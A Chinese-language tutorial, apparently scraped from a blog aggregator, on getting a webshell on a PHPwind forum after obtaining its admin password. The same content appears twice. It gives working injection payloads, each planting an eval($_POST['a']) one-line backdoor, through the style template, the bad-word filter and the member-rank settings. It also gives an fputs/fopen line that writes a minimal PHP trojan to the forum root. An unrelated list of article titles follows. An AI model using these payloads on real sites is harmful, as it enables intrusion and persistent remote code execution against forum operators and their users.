PHPwind后台获取Webshell
来源:互联网 发布:淘宝卖家显示商品过期 编辑:程序博客网 时间:2024/04/30 02:28
发现的一个phpwind漏洞搞的热闹非凡,该漏洞是因为message.php 文件的几个变量未进行过滤造成的。官方已发布补丁,所以我在这里摘一点关于取得管理密码后怎么拿webshell的方法:
方式1 模板法
进入后台, 风格模版设置 ,在随便一行写代码
记住,这代码必须顶着左边行写,代码前面不可以有任何字符。
EOT;
eval($a);
print <<<EOT
例如,我写完某一行为。
.headurl { color:#ffffff;}
EOT;
eval($_POST['a']);
print <<<EOT
.index_font{color: #3A4F6C;background-color:#EBEBEB; font-weight:bold;padding: 5px;}
而后得到一个shell
http://localhost/bbs/index.php
(由于写到css里,也许有的操作无法返回,但是只要没有什么问题,一般操作都是可以接受的)
密码是a lanker的一句话后门。
方始2 脏话过滤法
进入安全管理 ◇ 不良词语过滤
新增
不良词语写 a']='aa';eval($_POST['a']);//
替换为那里可以随意
而后得到一个shell地址为
http://localhost/bbs/data/bbscache/wordsfb.php
密码是a lanker的一句话后门。
方式3 用户等级管理
然后新建立会员组
头衔你可以随便写,但是千万不要写单双引号特殊符号,升级图片号写a';eval($_POST['a']);//
升级点数依然可以随意写。
而后得到一个shell地址为
http://localhost/bbs/data/bbscache/level.php
密码是a lanker的一句话后门。
这里提供的方式随便你选一种都可以得到shell。。。
方式三请按说明仔细操作,否则会导致论坛无法正常运行,后果,自负。
可我一一试过,没能拿到SHELL.
三种方法
1:后台添加个 asa 上传
2:<?fputs(fopen("./a.php","w"),"<?eval(/$_POST[a]);?>")?>然后看图修改包含银行查件文件名
bank.php为上传的phpshell的相对路径,访问url://hack.php?H_name=bank,就会在论坛根目录生成一
个a.php的最小马。
3:不用上传就是在词语替换那<?fputs(fopen("./a.php","w"),"<?eval(/$_POST[a]);?>")?>插入,然后
备份wordsfb字段记下相对路径。
-----------------------------------------------------------------
phpwind后台获得shell(貌似很管用)
如果是winnt系统直接添加一个.asa后缀的文件,(dz可以直接传asa)在后台找到文件上传的后的文件名,
论坛发个phpshell,<?fputs(fopen("./a.php","w"),"<?eval(/$_POST[a]);?>")?>
然后看图修改包含银行查件文件名bank.php为上传的phpshell的相对路径,
访问url://hack.php?H_name=bank,就
会在论坛根目录生成一个a.php的最小马。
还有不用上传就是在词语替换那<?fputs(fopen("./a.php","w"),"<?eval(/$_POST[a]);?>")?>插入,
然后备份wordsfb字段记下相对路径 http://www.98exe.cn南域安全网 windows最新漏洞,网络技术!·#¥%%……
方式1 模板法
进入后台, 风格模版设置 ,在随便一行写代码
记住,这代码必须顶着左边行写,代码前面不可以有任何字符。
EOT;
eval($a);
print <<<EOT
例如,我写完某一行为。
.headurl { color:#ffffff;}
EOT;
eval($_POST['a']);
print <<<EOT
.index_font{color: #3A4F6C;background-color:#EBEBEB; font-weight:bold;padding: 5px;}
而后得到一个shell
http://localhost/bbs/index.php
(由于写到css里,也许有的操作无法返回,但是只要没有什么问题,一般操作都是可以接受的)
密码是a lanker的一句话后门。
方始2 脏话过滤法
进入安全管理 ◇ 不良词语过滤
新增
不良词语写 a']='aa';eval($_POST['a']);//
替换为那里可以随意
而后得到一个shell地址为
http://localhost/bbs/data/bbscache/wordsfb.php
密码是a lanker的一句话后门。
方式3 用户等级管理
然后新建立会员组
头衔你可以随便写,但是千万不要写单双引号特殊符号,升级图片号写a';eval($_POST['a']);//
升级点数依然可以随意写。
而后得到一个shell地址为
http://localhost/bbs/data/bbscache/level.php
密码是a lanker的一句话后门。
这里提供的方式随便你选一种都可以得到shell。。。
方式三请按说明仔细操作,否则会导致论坛无法正常运行,后果,自负。
可我一一试过,没能拿到SHELL.
三种方法
1:后台添加个 asa 上传
2:<?fputs(fopen("./a.php","w"),"<?eval(/$_POST[a]);?>")?>然后看图修改包含银行查件文件名
bank.php为上传的phpshell的相对路径,访问url://hack.php?H_name=bank,就会在论坛根目录生成一
个a.php的最小马。
3:不用上传就是在词语替换那<?fputs(fopen("./a.php","w"),"<?eval(/$_POST[a]);?>")?>插入,然后
备份wordsfb字段记下相对路径。
-----------------------------------------------------------------
phpwind后台获得shell(貌似很管用)
如果是winnt系统直接添加一个.asa后缀的文件,(dz可以直接传asa)在后台找到文件上传的后的文件名,
论坛发个phpshell,<?fputs(fopen("./a.php","w"),"<?eval(/$_POST[a]);?>")?>
然后看图修改包含银行查件文件名bank.php为上传的phpshell的相对路径,
访问url://hack.php?H_name=bank,就
会在论坛根目录生成一个a.php的最小马。
还有不用上传就是在词语替换那<?fputs(fopen("./a.php","w"),"<?eval(/$_POST[a]);?>")?>插入,
然后备份wordsfb字段记下相对路径 http://www.98exe.cn南域安全网 windows最新漏洞,网络技术!·#¥%%……
- PHPwind后台获取Webshell
- 在phpmyadmin后台获取webshell方法汇总整理
- phpMyAdmin 后台拿webshell
- 从后台拿到webshell
- 从后台得到webshell
- SDcms后台拿webshell
- phpMyAdmin 后台拿webshell
- 利用WEBSHELL直接进入后台!
- discuz6论坛后台建立WEBSHELL!
- disucz 6.1后台拿webshell
- Discuz!后台怎么拿到Webshell
- 利用log备份获取WEBSHELL
- 利用Log备份获取Webshell
- 利用public权限获取webshell
- 如何获取网站的webshell
- 从后台得到webshell技巧大汇总
- 从后台到webshell的一点思路
- dvbbs7.1 照样从后台得到webshell
- zz一篇不错的关于房价问题的文章
- Asp.net 中的 DataGrid 和 GridView 批量更新
- how to enumerate subkey names under an arbitrary key
- C语言中可变参数的原理和应用
- Java 虚拟机类装载:原理、实现与应用
- PHPwind后台获取Webshell
- Linux内核内存池管理技术实现分析
- Java Spring 配置学习笔记
- CComboBoxEx控件使用示例
- DNS配置全文
- IE7发布正式版 开发者应注意兼容性问题
- JUnit学习笔记(2007版)
- RequestProcessor类的process()方法执行流程
- POP3收信的perl客户端
